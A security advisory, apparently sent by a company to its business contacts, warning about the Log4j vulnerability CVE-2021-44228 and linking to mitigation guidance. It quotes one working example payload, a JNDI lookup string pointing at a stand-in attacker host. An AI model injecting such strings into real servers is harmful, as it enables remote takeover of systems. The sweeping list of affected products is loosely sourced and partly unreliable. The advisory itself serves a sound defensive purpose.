;

Critical Security Advisory - Log4j Vulnerability

Critical Security Advisory
We would like to draw your attention to a new and serious cyber security risk that has already impacted many companies.

This issue impacts Java webservers and can allow attackers to gain control of the server.

This issue is so serious, and attackers are exploiting it so quickly, that we are informing all companies we deal with, so you can act quickly to put mitigations in place with urgency.

Active exploitation is underway as confirmed by CERT NZ with industry peers observing attacks in region. 

About This Issue

The vulnerability is in Log4j, a widely used logging framework developed by the Apache Foundation and used by both enterprise apps and cloud services across the globe.

The ISC (Internet Storm Centre) tracks global threats to internet stability and have chosen this morning to raise the threat level to Yellow. This has not been seen since 2017 when the WannaCry Ransomware variant was running rampant and is something to be taken seriously.

This is currently being tracked as CVE-2021-44228 and impacts default configurations of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others. 

Proof of concept exploits have been shared targeting specific systems and services overnight with hundreds of active devices worldwide already identified as performing mass-scanning and exploitation of this vulnerability.

This exploit is easy to execute. It simply requires a certain user-controlled string being logged by a system. We’ve observed attacks that use the browser identifying user-agent string with a payload such as ${jndi:ldap://attacker.com/a} – with attacker.com being a hostile server used to control commands.

Exploitation data has been observed by Cloudflare - https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/.

What systems could be impacted

A very large number of products and systems use the Log4J logging system. It may not be immediately obvious which systems use Java – so please check your inventory.

Here is a list of software we know to be affected (this is being updated as we learn more).

Redis, Splunk, AWS Lambda, Apple iOS/iPadOS/macOS, Confluence, Jira, Jenkins, Discord, Webex, Amazon, Tesla, Kafka, Apple, Steam, Twitter among many others have been shown to be vulnerable to server-side takeovers.

What to do about it

This is the mitigation advice from Cloudflare - https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/

Consider removing all access from the internet to the impacted servers in the interim.

If you have questions about this, please reach out.